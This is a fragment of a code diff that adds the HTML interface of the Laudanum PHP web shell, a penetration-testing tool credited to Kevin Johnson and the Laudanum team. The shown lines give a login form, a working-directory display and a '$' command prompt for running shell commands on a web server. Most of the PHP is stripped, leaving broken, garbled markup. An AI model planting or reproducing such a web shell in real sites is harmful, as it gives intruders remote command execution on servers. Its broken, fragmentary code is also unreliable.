\n"; + ?> + +

Username:

+ +

Password:

+ +

+ + + +
+ + + +
+ Current Working Directory: + + +
+ +

+ $  +

+
+ +

+ Size: × + + + +

+ +
+ + + +
+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +